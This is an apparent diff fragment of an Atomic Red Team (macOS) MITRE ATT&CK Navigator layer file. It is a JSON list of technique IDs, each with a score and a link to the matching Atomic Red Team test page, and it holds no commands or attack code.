Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (macOS)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View 
